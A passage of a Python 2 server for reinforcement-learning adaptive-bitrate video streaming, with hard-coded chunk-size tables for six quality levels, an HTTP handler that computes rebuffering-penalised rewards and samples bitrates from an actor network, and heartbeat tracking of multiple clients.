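#            - SMOOTH_PENALTY * abs(VIDEO_BIT_RATE[bit_rate] - VIDEO_BIT_RATE[last_bit_rate]) / M_IN_K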
################################
# multiprocessing shared variables
manager=multiprocessing.Manager()
Que1=manager.list()
Que2=manager.list()
Dict1=manager.dict()
Dict2=manager.dict()
begin_time=time.time()
QueOnline=manager.list()
DictOnline = {}  # remember last quality for each IP
MultiClientState = {}  # format: {"IP": [(int)heartbeat_time_not_request_time, (int)quality]}
################################
# video chunk sizes
size_video1=[1756806,3091206,2210154,1845731,1817275,2069902,2117640,2061264,2237179,2132441,2044975,3789197,3250223,2487213,2149619,1765477,
2505293,2673223,2084351,2069989,1855189,2478422,2580412,2065841,2585352,1351167,1398486,1725385,2897186,4738096,1670320,1756062,
3048206,4866144,1843384,1584205,1884317,1858789,1038538,798577,2117675,2528940,1398909,3205655,2983891,2201743,2366969,2553838,
1501437,1267022,1644497,1367567,1203298,3427696,1968656,3096706,2066317,2634682,1694746,1434945,3173242,1693021,1682424,2113373,
3103217,2462552,2256905,2226073,1980055,2037901,2470135,2128194,2434345,1714265,1330462,2102803,1015863,865084,1634635,1229781,
1227461,1383375,1572941,1624467,1260343,2100804,1782111,3028204,1845902,1283138,1529032,1782594,1613129,1621860,1702228,1935782,
1908470,1820040,1542276,2025509,1672002,1681633,3771816,5057431,3537995,2803543,3831917,2709325,3627028,2349666,2466424,2215131,
2249004,1704399,1689433,1362005,1565350,2242939,2378241,2021904,2019269,1054954,2328052,2211591,2104177,2280895,1991117,1857563,
2209717,1711273,1293338,1289551,1976534,2284536,1925431,2869117,2469558,1435620,1240014,1811217,2988838,2552354,2365918,2065200,
2555376,1779921,2281000,2856816,2252510,1331370,1565606,1548717,3429310,1957226,1744946,1736383,2170169,2128049,2573352,2262965,
2877128,2632416,2110319,2309152,2087447,2303868,3110829,4470951,4276187,2646215,2596715,1701057,2932345,2622505,2362883,2360631,
3172401,3599259,2951048,1968506,2345232,1739989,1303134,1273197,1463247,1841675,2594747,3307177,1289034,2849319,2067334,1658999,
1451249,2074198,1510216,2665640,2975156,1903333,3534501,4269578,4256969,4212087,983135,527732,391690,1403108,1438881,1452557,
1917879,1613934,1871217,1188694,2512090,2858958,1531701,1008854,1003379,1815850,1586467,980482,1439500,2289989,2449550,3404941,
3365845,2830877,4573090,2648680,4028108,5273438,3649905,3386154,2446726,2965108,2245612,1832510,2071735,1755973,2019058,1360561,
1039489,1894295,1999107,1666014,2242594,1746466,2870885,2284279,1714119,2282746,1999381,2436148,1828361,2833893,2132959,1585105,
2275927,2131090,2951419,2197713,2049883,1657043,2195265,2978021,2007940,1712613,1729774,1533013,3056849,3034214,3327704,3120601,
2265234,1983515,2468537,2171814,1750435,1885298,2056222,2409637,1384308,1073859,1993041,2524543,2684433,2749667,1487433,2299203,
1711371,1882897,1979814,2600016,2829907,2024223,2435121,1745680,1733204,2311748,2360093,2962846,2530685,2333345,2573975,2688803,
1674837,2328829,2654846,2177220,1983637,1826992,1554600,1742047,1015182,1327517,1392909,1997961,2777906,2151277,1385355,1841831,
2576036,2248077,1670266,1921688,2513568,2592109,1866077,2254994,3076104,2892882,2637278,2258700,1223635,905654,900966,532695,
678430,1684441,1272715,1174559,1071726,1261171,1574531,1726304,1393375,1612197,1577541,1178594,1331352,1471475,1258708,1417142,
1337069,1753784,3098761,1712958,1487216,1749591,2094655,1655374,1838915,1632130,4455112,1103313,4325538,4260027,3363232,1966800,
2387229,2734086,2389536,2457011,2795839,2917015,2516264,2127460,2593348,3241121,3966814,3003788,1984507,2589085,2196063,1610600,
1378770,2396778,1976157,1717434,669393,1027820,1375132,1464032,1326640,1729066,1534541,1787945,2596315,3393474,2786962,3161567,
2753054,2801599,3086005,2440861,3156653,4016406,3399126,3785131,4186971,3408842,2612351,2792930,2184320,1364863,1291497,958698,
1640227,1815859,1795500,2069010,2016002,1406199,1373710,1718790,980021,862871,990244,1247321,1934872,1727416,1281950,1283997,
2167162,1437622,911988,1208836,1855819,1746139,2142901,3077141,2097075,1667617,2375729,1176383,1534788,2019092,1649060,1119606,
2066820]
size_video2=[1248166,1909948,1437354,1206293,1202036,1374260,1394562,1352039,1499553,1420399,1360662,2352325,2206383,1618768,
1455386,1204706,1713574,1864652,1448970,1398569,1293903,1662378,1778570,1405415,1767145,754576,789631,1047145,1830919,3283497,
1110502,1143921,2082236,3252018,1219923,1071692,1295207,1266141,656576,503078,1354183,1699087,927720,2208172,2011759,1494987,
1602807,1716281,996382,808047,975928,884332,755695,2258444,1301747,2091230,1441438,1791927,1142314,948784,2118602,1134808,1088077,
1419506,2094634,1666971,1573121,1445975,1315146,1393944,1676874,1438847,1587400,1082750,855365,1309596,616101,522811,1009092,
755328,744447,856311,990560,994122,741287,1350804,1149553,2095051,1184299,762583,968586,1179001,1003173,998496,1057590,1243591,
1237504,1117387,937314,1261624,1166183,1171457,2696482,3460711,2432287,1831251,2639863,1888769,2576440,1610171,1708230,1492094,
1538209,1132001,1123038,874553,1004636,1426699,1544177,1349606,1360880,645082,1354293,1398892,1451433,1504901,1328553,1263252,
1509891,1153670,855640,864167,1392355,1511324,1301036,1948238,1647259,955411,816968,1185012,2007860,1648783,1522896,1335718,
1707248,1085428,1457959,1994052,1475727,828972,948348,933982,2382507,1225258,1097507,1118835,1448416,1390061,1695141,1496810,
1954410,1774003,1366911,1524592,1368957,1501570,2095420,3114760,2838416,1502515,1694876,1053663,2100929,1903225,1667629,1663218,
2248474,2551140,2051397,1347603,1626107,1164880,871909,857484,973494,1264289,1741906,2304449,845899,1950152,1361535,1096620,
956379,1374366,979791,1713882,1980346,1253742,2331705,2782848,2771738,2807548,644361,352430,247261,924748,983983,978337,1273457,
1072491,1233180,753303,1719760,1976297,1020941,643472,632199,1212648,1033471,622503,954344,1418860,1581120,2280953,2273723,
1722839,3004290,1786110,2762113,3508086,2471169,2290623,1631933,2022588,1501694,1221686,1392053,1162530,1350142,916630,692591,
1272848,1376995,1130650,1511110,1188451,1956043,1553905,1190117,1536041,1334153,1620445,1229638,1904189,1437879,1043343,1484736,
1389038,1962114,1379569,1348907,1083199,1464620,1986660,1331590,1086919,1129684,1020726,2049670,2077307,2244912,2092287,1502555,
1329093,1638317,1432601,1186820,1259056,1378272,1592067,894118,702494,1328338,1707818,1858005,1814721,965118,1491287,1130946,
1245095,1297373,1761282,1887826,1337368,1614799,1121034,1145238,1497043,1606601,2025110,1710529,1583480,1723662,1810776,1113208,
1547386,1774950,1421925,1206322,1187183,1004007,1147471,676151,894621,880733,1266385,1848743,1457129,887321,1185256,1683346,
1454053,1091702,1298560,1702106,1712364,1162421,1518078,2105991,1963481,1783520,1462072,721990,579786,589643,344866,427515,
1117244,806288,741042,675112,787869,1011434,1126209,885267,1055611,1018506,773227,870077,912214,776772,883886,862865,1150468,
2067548,1099289,945530,1150026,1362064,1050127,1197301,1075450,2836687,702922,2875327,2778004,2245324,1287876,1575207,1779274,
1563888,1703575,1879597,1981220,1706876,1336949,1679947,2160617,2693480,2009306,1332161,1758489,1457012,1054975,926778,1589787,
1315164,1139932,406770,664625,936523,928176,835472,1167407,994739,1185573,1740000,2319760,1837859,2103152,1854032,1873751,2125146,
1614715,2116308,2777412,2292582,2515009,2837060,2395144,1790486,1913686,1448776,902340,828891,617586,1081453,1195033,1179707,
1339413,1300244,935908,880962,1098413,618451,537171,620261,773863,1240249,1093356,802481,790748,1415323,837047,545014,773276,
1225405,1133886,1437142,2045825,1351366,1027020,1495764,704275,989618,1287214,1087634,718747,1318691]
size_video3=[846285,1168830,924155,782361,776921,896171,904410,867529,987852,931970,884019,1388977,1386547,1061921,985293,802234,
1169255,1286193,995130,938950,889120,1097258,1199443,945496,1179962,430164,436726,624519,1113671,2138958,731588,732163,1371730,
2110792,788301,712212,865112,846544,419881,323168,854227,1103578,603737,1462476,1328702,995325,1062304,1130531,658362,515203,
564263,576357,481669,1439148,831514,1345162,986175,1206557,761735,621067,1371358,739751,691765,948480,1381127,1093177,1075045,
921199,858138,939164,1113522,952278,1002220,678313,545154,794368,368560,322602,627633,465516,454419,527661,617205,601121,418400,
838302,720424,1421671,743692,444613,590983,767637,605102,586040,629895,773906,770305,679673,553179,767895,798336,717269,1749944,
2232941,1630935,1191422,1750938,1335785,1831757,1108036,1190875,1006044,1040709,746704,736186,559337,646623,884342,996032,902282,
898520,388061,706020,837590,997771,984903,869629,841845,1003621,765322,549112,567129,962434,983686,849944,1297068,1068550,630926,
534534,753751,1297143,1033674,972729,860044,1146757,643290,916479,1371688,950221,503853,565079,558122,1579179,764904,684818,714375,
958026,897292,1095530,976392,1284670,1157384,849960,983202,885117,949242,1378747,2093615,1794015,892920,1070196,636000,1427417,
1358293,1161687,1148764,1556485,1755196,1391857,901239,1101441,767029,575457,571960,640246,852139,1153342,1551623,552146,1303983,
884697,728329,631483,890909,629541,1057592,1264644,812359,1495774,1802682,1794299,1809999,421592,234510,162002,598631,660455,
650412,831883,704816,796782,469916,1141450,1332339,673944,405808,393579,790772,668101,391316,620897,855778,987162,1437210,1494618,
1000189,1977624,1160710,1853267,2272158,1620476,1512714,1065616,1349832,985649,800298,916009,747151,878787,611733,458891,824552,
936781,763908,1005463,805397,1309198,1027202,824776,1018133,878999,1059264,816116,1245755,950480,675165,934743,881605,1262539,
836769,868241,689535,960324,1290799,875221,677750,719309,673009,1332185,1381609,1467929,1364835,972063,879023,1062308,925128,
796868,822789,917077,1038227,572879,460030,870647,1135715,1267450,1170787,608866,932475,718075,794316,835131,1173614,1226376,
873792,1039123,698256,744176,962960,1076340,1357311,1134278,1063750,1129502,1193512,731147,1008405,1172782,916351,714909,746975,
628955,733798,452985,599131,547008,788141,1187992,947166,556402,745185,1072325,919245,703608,867170,1130427,1110818,720520,1007762,
1397415,1311440,1185457,919927,415043,381670,384138,221070,272611,721164,508382,463087,418721,476494,636457,721220,555097,676089,
633209,496792,565895,553631,472079,531680,549381,738800,1333841,682133,579828,733952,859037,656064,756593,693793,1828137,431863,
1810452,1836670,1447052,837477,1007940,1130632,997037,1164277,1231827,1316193,1135411,817342,1051188,1391898,1762282,1306967,
877949,1172156,944666,677181,614653,1029902,861520,751279,251924,434194,637408,585673,517743,779377,624265,767662,1141932,1552512,
1182714,1350835,1216575,1221492,1437167,1047801,1352884,1866550,1498852,1594916,1933364,1666636,1216493,1299406,946556,587152,
523357,398282,698490,768546,747186,839672,816283,609526,551500,685818,385510,332617,384081,472836,784876,681576,495325,478054,
910864,486727,327909,490384,787676,714464,934579,1322102,836378,608941,898288,419176,631361,777189,710660,463377,848825]
size_video4=[547035,706404,596043,524098,504228,582524,590858,552807,649725,609806,581924,835167,856359,720885,648993,549888,798544,
890208,680375,621228,612247,714936,801526,636640,781633,258480,256981,381833,668878,1316285,483083,470324,887319,1346096,488576,
476883,574255,560775,275294,213942,544631,721930,394905,956401,866807,668112,707053,752293,439005,328990,332676,381240,315599,
905000,536920,856841,676222,814761,511744,406110,872426,478738,441067,638082,902857,705191,735017,597647,564153,640146,744700,
634426,622405,429916,348023,473333,223233,207060,398798,297699,289124,338019,386894,376068,247323,529278,458771,954008,469848,
268451,367008,510493,384351,336696,365757,469230,466878,397890,306208,392038,480889,427503,1061331,1462570,1107397,788212,1201905,
958934,1296354,764232,834022,684159,703462,494688,476757,358278,421053,547982,651712,605673,604769,247633,362988,500301,679289,
636811,569262,554524,657393,500344,353603,370888,654913,640820,555403,854536,682544,425652,353977,482904,831613,646249,623250,
570778,781138,395629,591756,919672,608636,315279,348908,341251,1028395,493213,433388,461614,633669,582445,710571,635445,829185,
740760,520948,625161,572429,587024,885619,1366909,1096009,549068,693014,384613,967739,961765,802806,786390,1063204,1193221,938432,
594814,738128,514183,385394,386211,419937,569630,759702,1035614,363332,867267,584199,495296,418710,579747,407271,643695,793432,
532780,953519,1181184,1173164,1150240,278260,158326,109243,391560,447495,432372,541903,462974,514903,297437,746687,889772,446977,
261064,245091,514842,433432,248997,401709,510992,623671,875583,954252,565854,1282428,760254,1230934,1471145,1041466,1007408,
700685,908906,647372,531923,604648,480567,571680,415481,311725,528791,648577,526915,676767,544984,877852,681274,584479,682400,
587249,697584,541523,819236,635454,439248,575534,558134,795960,507237,560309,435884,630696,842280,584377,418701,452008,447495,
855620,910486,955619,874290,634816,588917,688253,601008,545601,546370,622967,696809,377403,307085,582646,767567,881993,759744,
380057,569142,450995,500151,533009,787180,796757,579408,665424,428991,486141,634709,724968,910350,755342,723301,744499,791097,
486696,650661,775896,589564,417632,460207,386577,461058,309090,401728,335814,488570,758867,599018,354581,449831,677583,583268,
452635,579431,752699,725899,457825,661835,924337,879308,792148,572914,236078,252664,248583,143285,173576,464535,323435,290071,
259483,286196,396866,459208,346403,429612,379429,317461,373328,334657,285622,316216,347387,474325,846736,421261,358587,460670,
540837,418151,473605,443747,1142146,266099,1139106,1226865,912006,544488,637168,726559,633507,783324,803464,874546,749552,490660,
644883,880869,1134430,839081,575502,778336,608858,437231,411106,666015,563343,500243,160495,290749,441946,380307,327141,528851,
386873,499151,742431,1004036,756402,854695,798836,797035,965829,672367,837390,1234139,962167,972983,1314591,1183313,847271,900132,
623507,383196,331639,259707,448397,491216,470078,535948,506772,404948,343057,429095,241972,208979,237532,289286,502020,428997,
308660,291778,588501,298147,204497,313212,504692,445722,619353,831848,511452,357941,535866,252048,403999,477594,454970,301303,551953]
size_video5=[323113,418441,382004,337817,318822,366200,363903,346976,404249,383861,369141,500281,492772,467460,412406,364336,530546,
595068,453373,400416,406242,447605,508492,416723,492336,153985,149450,221825,389137,790219,302059,288733,540456,825815,285915,
304614,354511,356853,174974,139405,344879,446520,249322,594647,540016,434577,456950,491623,284629,206793,194787,245465,201172,
543139,328951,533104,446793,532154,333255,259306,513006,294784,273182,414589,562032,426081,491024,375053,356030,434816,485000,
415484,363173,267232,217152,268349,130234,129844,244414,183197,181289,211852,230048,232458,147458,323339,286466,621150,292710,
157388,224852,330448,244658,189794,208443,272864,272767,219585,160716,199810,281265,234643,623111,905443,715137,496016,757193,
653100,866715,509267,565709,439095,458179,317013,299723,220237,265702,326004,406891,398108,396428,161148,189747,289152,438311,
391808,350823,342642,404291,312421,215746,231048,419638,401633,350467,540680,413555,274948,226952,298374,504645,399332,385815,
376112,518000,240102,380381,592007,379115,193082,217973,203101,629581,312102,266984,289355,406154,364723,444534,405512,503590,
445920,301669,381944,350196,336701,533864,849909,638562,325653,440403,227952,636997,657734,525502,518535,689114,782104,610917,
376978,476526,340219,251135,252753,267845,366877,470621,673027,231795,555250,369340,329086,269267,364173,255834,373785,469492,
336207,598436,747522,744086,688734,182335,102883,71090,251738,294267,277818,338245,291138,317642,182073,467537,572660,290618,
163813,145742,323299,269998,151414,247136,299386,379185,511734,583799,309771,794744,474007,777870,916062,639704,663002,444759,
596148,410568,350269,389119,296238,363553,277452,211307,324543,445667,365955,459618,364370,580715,438804,412688,454548,384954,
449872,351636,532810,418362,278056,331408,337389,468421,287027,339677,265929,405248,543069,387402,240196,265294,288498,506694,
574841,596509,526249,403785,389295,440901,377555,376321,360924,424678,470015,246729,206103,391925,514724,604960,481393,227540,
320553,265336,292954,332903,526009,509974,379518,402580,247420,307887,399296,490999,599427,493224,485382,474936,511692,327348,
403054,509642,370452,220414,268766,223824,273431,210187,260215,194459,282781,458374,361910,222321,254376,398627,353268,277424,
373952,485170,458908,283968,415847,594244,581598,513771,336212,123056,159415,152039,84419,96964,296357,197550,174412,150205,
163490,234384,276420,206155,251134,207262,189865,234699,190492,162133,172192,208515,294919,506806,243271,208423,266189,317494,
252397,272579,266038,626921,160573,687288,805076,516668,334312,382256,432601,382803,509989,497589,559731,472280,271315,372954,
517170,690202,505692,358051,497198,379108,274271,264254,417412,356246,329139,100180,192502,302659,248706,201499,350511,223655,
308401,454270,637270,464928,511545,498959,503850,626394,410515,466441,761200,580059,554024,831652,823388,590577,625131,404481,
242549,205265,168423,277268,309949,278503,325049,292610,262838,201999,257126,143254,124497,137758,167697,308527,256226,182915,
168765,363172,179420,124656,188561,300983,262333,396335,493415,295359,207622,306053,145571,246429,285851,275563,186508,346649]
size_video6=[122566,141690,156437,151455,131958,141687,134848,143568,169611,155749,144962,187567,189741,191607,169931,160854,236280,
279955,203736,174786,193874,187167,207081,196253,203820,58306,52004,70463,114188,248094,120126,105738,187819,288450,107224,132126,
132775,150099,72040,63120,142264,179063,113063,237672,222641,210179,206024,226841,125166,86270,76277,111752,86103,186977,124488,
195494,209856,232665,151864,114023,181418,107522,111914,191996,231947,145572,228523,165245,154746,217987,232697,199480,132247,
114355,92243,101533,44432,46959,92051,64667,69881,82966,70706,91967,52126,115033,106804,257487,110329,52198,86248,137809,98071,
59563,67579,89812,87619,65049,51508,66553,97090,69339,218786,350602,282395,196655,294150,274147,350502,229885,264751,188592,194004,
138597,129254,90055,113934,119577,163598,176947,176958,64953,63686,94317,174842,133878,119038,116797,143402,114567,79187,85619,
158887,158149,136588,211814,149475,111228,90166,110685,182666,164383,153601,193728,240841,89363,172541,249048,155912,72714,96738,
76146,210967,138516,104483,112952,166011,143486,173754,163990,184907,157542,102142,138713,132187,103266,186551,302474,233690,114527,
183684,86990,275527,303484,247110,243197,306068,333494,259092,161551,219694,163689,115479,115867,110157,165717,206413,316094,106605,
258595,167706,161871,126251,164223,106360,140197,171683,142022,226802,274115,317194,289925,80931,38396,28340,124143,139033,128434,
145168,122302,127194,68553,208520,246036,119157,62046,49114,123744,104524,56056,81724,107806,129717,178197,219082,87764,309996,
175234,291302,381763,260114,311747,197184,285496,184984,171407,180922,127859,167708,142347,108401,127627,229023,194597,231589,
188967,293808,207290,225385,222372,182989,208632,165647,262519,198122,119059,136057,151258,207737,126195,142675,116189,196934,
273298,169687,80087,89952,116953,203808,258544,276055,251654,191358,176143,185613,174725,183381,183890,208329,222059,115871,103659,
194619,263618,323870,232819,101175,148358,120409,137639,169775,286516,266060,186239,185178,111048,131835,191865,248460,308506,
263337,268120,252697,279984,174154,193877,250368,165544,97614,128553,106663,133692,98249,131557,84157,120094,191725,157144,106115,
103896,189100,153325,105096,185534,243798,242423,135512,204760,313395,292357,286477,158682,36035,72722,58693,21160,29201,149424,
93095,73211,52395,60533,84569,100012,78060,95461,63814,66318,90387,64036,46982,48426,64363,108625,183411,70708,64343,82518,105266,
82540,70162,71644,64605,51629,207652,169915,122208,106258,133986,162789,140802,190933,160253,206255,174223,70660,113933,173128,
261541,173884,115544,179952,131746,92096,84877,151907,131972,127129,27791,55798,115167,97179,63504,113963,41194,72340,149359,
210948,145277,142456,148052,171092,235134,102985,129884,278803,214629,183098,306658,352088,282790,309863,185129,100329,81350,
64536,120000,135855,104350,136764,97760,99442,67417,84531,36782,30662,33807,40182,96727,72553,43191,38019,107349,45983,30115,
45931,84315,65096,123915,152798,77492,43261,76665,36196,69589,62195,61628,33154,80528]
def get_chunk_size(quality, index):
    if ( index < 0 or index > 448 ):
        return 0
    # note that the quality and video labels are inverted (i.e., quality 5 is the highest and pertains to video1)
    sizes = {5: size_video1[index], 4: size_video2[index], 3: size_video3[index], 2: size_video4[index], 1: size_video5[index], 0: size_video6[index]}
    return sizes[quality]
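# Illustrative use only (not part of the original module): given a hypothetical
# throughput estimate `throughput_bps` in bytes per second, the expected download
# time of a chunk at a given quality could be estimated as
#   est_seconds = get_chunk_size(quality, index) / float(throughput_bps)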
class my_socketserver(SocketServer.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, server_address, RequestHandlerClass):
        SocketServer.ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
def make_request_handler(input_dict):

    class Request_Handler(BaseHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            self.input_dict = input_dict
            self.sess = input_dict['sess']
            self.log_file = input_dict['log_file']
            self.actor = input_dict['actor']
            self.critic = input_dict['critic']
            self.saver = input_dict['saver']
            self.s_batch = input_dict['s_batch']
            self.a_batch = input_dict['a_batch']
            self.r_batch = input_dict['r_batch']
            BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
        def do_POST(self):
            content_length = int(self.headers['Content-Length'])
            post_data = json.loads(self.rfile.read(content_length))
            #print post_data

            if ( 'pastThroughput' in post_data ):
                # @Hongzi: this is just the summary of throughput/quality at the end of the load
                # so we don't want to use this information to send back a new quality
                print "Summary: ", post_data
            elif ( 'heartbeat' in post_data ):
                if self.client_address[0] not in Que1:
                    Que1.append(self.client_address[0])
                #print('Que1', Que1[:])
                #print self.client_address
                send_data = "receive hb"
                self.send_response(200)
                self.send_header('Content-Type', 'text/plain')
                self.send_header('Content-Length', len(send_data))
                self.send_header('Access-Control-Allow-Origin', "*")
                self.end_headers()
                self.wfile.write(send_data)
            else:
                ########## Algorithm write here! Now you get all info! #########
                global begin_time
                t = float(time.time() - begin_time)
                q = int(post_data['lastquality'])
                global Dict1, Dict2
                if self.client_address[0] in Dict1.keys():
                    tmp = Dict1[self.client_address[0]]
                    tmp.append(t)
                    Dict1[self.client_address[0]] = tmp
                    tmp = Dict2[self.client_address[0]]
                    tmp.append(q)
                    Dict2[self.client_address[0]] = tmp
                else:
                    Dict1[self.client_address[0]] = [t]
                    Dict2[self.client_address[0]] = [q]
                #print(Dict1[self.client_address[0]], Dict2[self.client_address[0]])
                global DictOnline, QueOnline
                # iterate over a copy of the keys so entries can be removed safely
                for k in DictOnline.keys():
                    if k not in QueOnline[:]:
                        DictOnline.pop(k)
                DictOnline[self.client_address[0]] = q
                # option 1. reward for just quality
                # reward = post_data['lastquality']
                # option 2. combine reward for quality and rebuffer time
                #           tune up the knob on rebuf to prevent it more
                # reward = post_data['lastquality'] - 0.1 * (post_data['RebufferTime'] - self.input_dict['last_total_rebuf'])
                # option 3. give a fixed penalty if video is stalled
                #           this can reduce the variance in reward signal
                # reward = post_data['lastquality'] - 10 * ((post_data['RebufferTime'] - self.input_dict['last_total_rebuf']) > 0)
                # option 4. use the metric in SIGCOMM MPC paper
                rebuffer_time = float(post_data['RebufferTime'] - self.input_dict['last_total_rebuf'])

                # --linear reward--
                reward = VIDEO_BIT_RATE[post_data['lastquality']] / M_IN_K \
                         - REBUF_PENALTY * rebuffer_time / M_IN_K \
                         - SMOOTH_PENALTY * np.abs(VIDEO_BIT_RATE[post_data['lastquality']] -
                                                   self.input_dict['last_bit_rate']) / M_IN_K
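                # Worked example (illustrative only, assuming the constants defined above
                # are REBUF_PENALTY = 4.3, SMOOTH_PENALTY = 1 and M_IN_K = 1000.0):
                # with VIDEO_BIT_RATE[lastquality] = 1200 Kbps, last_bit_rate = 750 Kbps
                # and 500 ms of rebuffering, reward = 1.2 - 4.3 * 0.5 - 0.45 = -1.40,
                # i.e. a single half-second stall outweighs the quality gain.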
                # --log reward--
                # log_bit_rate = np.log(VIDEO_BIT_RATE[post_data['lastquality']] / float(VIDEO_BIT_RATE[0]))
                # log_last_bit_rate = np.log(self.input_dict['last_bit_rate'] / float(VIDEO_BIT_RATE[0]))
                # reward = log_bit_rate \
                #          - 4.3 * rebuffer_time / M_IN_K \
                #          - SMOOTH_PENALTY * np.abs(log_bit_rate - log_last_bit_rate)

                # --hd reward--
                # reward = BITRATE_REWARD[post_data['lastquality']] \
                #          - 8 * rebuffer_time / M_IN_K - np.abs(BITRATE_REWARD[post_data['lastquality']] - BITRATE_REWARD_MAP[self.input_dict['last_bit_rate']])

                ########## save reward to file ##########
                f = open("ip_time_rewards.json", 'r')
                fcntl.flock(f, fcntl.LOCK_EX)
                try:
                    load_rewards = json.load(f)
                except:
                    load_rewards = {}
                # drop stale entries; not strictly necessary here, could be moved to an init procedure
                for ip in load_rewards.keys():
                    if int(load_rewards[ip].keys()[0]) < begin_time:
                        load_rewards.pop(ip)
                fcntl.flock(f, fcntl.LOCK_UN)
                f.close()
                if self.client_address[0] not in load_rewards.keys():
                    load_rewards[self.client_address[0]] = {str(int(time.time())): reward}
                else:
                    load_rewards[self.client_address[0]].update({str(int(time.time())): reward})
                print(load_rewards)
                f = open("ip_time_rewards.json", 'w')
                fcntl.flock(f, fcntl.LOCK_EX)
                json.dump(load_rewards, f)
                fcntl.flock(f, fcntl.LOCK_UN)
                f.close()
                #########################################
                self.input_dict['last_bit_rate'] = VIDEO_BIT_RATE[post_data['lastquality']]
                self.input_dict['last_total_rebuf'] = post_data['RebufferTime']

                # retrieve previous state
                if len(self.s_batch) == 0:
                    state = [np.zeros((S_INFO, S_LEN))]
                else:
                    state = np.array(self.s_batch[-1], copy=True)

                # compute bandwidth measurement
                video_chunk_fetch_time = post_data['lastChunkFinishTime'] - post_data['lastChunkStartTime']
                video_chunk_size = post_data['lastChunkSize']

                # compute number of video chunks left
                video_chunk_remain = TOTAL_VIDEO_CHUNKS - self.input_dict['video_chunk_count']
                self.input_dict['video_chunk_count'] += 1

                # dequeue history record
                state = np.roll(state, -1, axis=1)

                next_video_chunk_sizes = []
                for i in xrange(A_DIM):
                    next_video_chunk_sizes.append(get_chunk_size(i, self.input_dict['video_chunk_count']))
                # this should be S_INFO number of terms
                try:
                    state[0, -1] = VIDEO_BIT_RATE[post_data['lastquality']] / float(np.max(VIDEO_BIT_RATE))
                    state[1, -1] = post_data['buffer'] / BUFFER_NORM_FACTOR
                    state[2, -1] = float(video_chunk_size) / float(video_chunk_fetch_time) / M_IN_K  # kilo byte / ms
                    state[3, -1] = float(video_chunk_fetch_time) / M_IN_K / BUFFER_NORM_FACTOR  # 10 sec
                    state[4, :A_DIM] = np.array(next_video_chunk_sizes) / M_IN_K / M_IN_K  # mega byte
                    state[5, -1] = np.minimum(video_chunk_remain, CHUNK_TIL_VIDEO_END_CAP) / float(CHUNK_TIL_VIDEO_END_CAP)
                except ZeroDivisionError:
                    # this should occur VERY rarely (roughly 1 out of 3000 chunks), likely a dash issue;
                    # in this case we ignore the observation and roll back to an earlier one
                    if len(self.s_batch) == 0:
                        state = [np.zeros((S_INFO, S_LEN))]
                    else:
                        state = np.array(self.s_batch[-1], copy=True)
                # log wall_time, bit_rate, buffer_size, rebuffer_time, video_chunk_size, download_time, reward
                self.log_file.write(str(time.time()) + '\t' +
                                    str(VIDEO_BIT_RATE[post_data['lastquality']]) + '\t' +
                                    str(post_data['buffer']) + '\t' +
                                    str(rebuffer_time / M_IN_K) + '\t' +
                                    str(video_chunk_size) + '\t' +
                                    str(video_chunk_fetch_time) + '\t' +
                                    str(reward) + '\n')
                self.log_file.flush()

                action_prob = self.actor.predict(np.reshape(state, (1, S_INFO, S_LEN)))
                action_cumsum = np.cumsum(action_prob)
                bit_rate = (action_cumsum > np.random.randint(1, RAND_RANGE) / float(RAND_RANGE)).argmax()
                # Note: we need to discretize the probability into 1/RAND_RANGE steps,
                # because there is an intrinsic discrepancy in passing single state and batch states
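                # Illustrative example (not part of the original logic): if
                # action_prob = [0.1, 0.2, 0.4, 0.2, 0.05, 0.05], then
                # action_cumsum = [0.1, 0.3, 0.7, 0.9, 0.95, 1.0]; a uniform draw of
                # about 0.55 yields the boolean mask [F, F, T, T, T, T], whose argmax()
                # is 2, so quality index 2 is sampled with probability ~0.4 overall.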
                # send data to html side
                send_data = str(bit_rate)

                end_of_video = False
                if ( post_data['lastRequest'] == TOTAL_VIDEO_CHUNKS ):
                    send_data = "REFRESH"
                    end_of_video = True
                    self.input_dict['last_total_rebuf'] = 0
                    self.input_dict['last_bit_rate'] = DEFAULT_QUALITY
                    self.input_dict['video_chunk_count'] = 0
                    self.log_file.write('\n')  # so that in the log we know where video ends

                self.send_response(200)
                self.send_header('Content-Type', 'text/plain')
                self.send_header('Content-Length', len(send_data))
                self.send_header('Access-Control-Allow-Origin', "*")
                self.end_headers()
                self.wfile.write(send_data)

                # record [state, action, reward]
                # put it here after training, notice there is a shift in reward storage
                if end_of_video:
                    self.s_batch = [np.zeros((S_INFO, S_LEN))]
                else:
                    self.s_batch.append(state)
        def do_GET(self):
            print >> sys.stderr, 'GOT REQ'
            self.send_response(200)
            #self.send_header('Cache-Control', 'Cache-Control: no-cache, no-store, must-revalidate max-age=0')
            self.send_header('Cache-Control', 'max-age=3000')
            self.send_header('Content-Length', 20)
            self.end_headers()
            self.wfile.write("console.log('here');")

        def log_message(self, format, *args):
            return

    return Request_Handler
###### onlineCheck #######
def onlineCheck(Que1_, Que2_, QueOL):
    while True:
        #print('updateQue')
        updateQue(Que1_, Que2_, QueOL)
        global Dict1, Dict2, MultiClientState, begin_time
        f = open("OLlist.json", 'r')
        fcntl.flock(f, fcntl.LOCK_EX)
        try:
            MultiClientState = json.load(f)
            print(MultiClientState)
        except:
            MultiClientState = {}
        # drop clients that have not been seen for more than 10 seconds
        for ip in MultiClientState.keys():
            if int(time.time()) - MultiClientState[ip][0] - 10 > 0:
                MultiClientState.pop(ip)
        tmp = {}
        try:
            tmp[QueOL[:][0]] = [time.time(), max(max(Dict2.values()))]
        except:
            pass
        MultiClientState.update(tmp)
        print(MultiClientState)
        fcntl.flock(f, fcntl.LOCK_UN)
        f.close()
        f = open("OLlist.json", 'w')
        fcntl.flock(f, fcntl.LOCK_EX)
        json.dump(MultiClientState, f)
        fcntl.flock(f, fcntl.LOCK_UN)
        f.close()
        plot(Dict1, Dict2)
        print(multi_agent_reward(Dict2))  # printed on each onlineCheck pass (or on each POST)
        time.sleep(5)
def updateQue(Que1_, Que2_, QueOL):
    #print('_Que1', Que1_[:])
    #print('_Que2', Que2_[:])
    #print('_QueOnline', QueOL[:])
    QueOL[:] = Que1_[:] + [item for item in Que2_[:] if item not in Que1_[:]]
    Que2_[:] = copy.copy(Que1_[:])
    Que1_[:] = []
    #print('Que1_', Que1_[:])
    #print('Que2_', Que2_[:])
    print('QueOnline_', QueOL[:])
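# Illustrative example (hypothetical addresses): if Que1_ = ['10.0.0.2'] holds the
# hosts that sent a heartbeat in the current interval and Que2_ = ['10.0.0.3'] the
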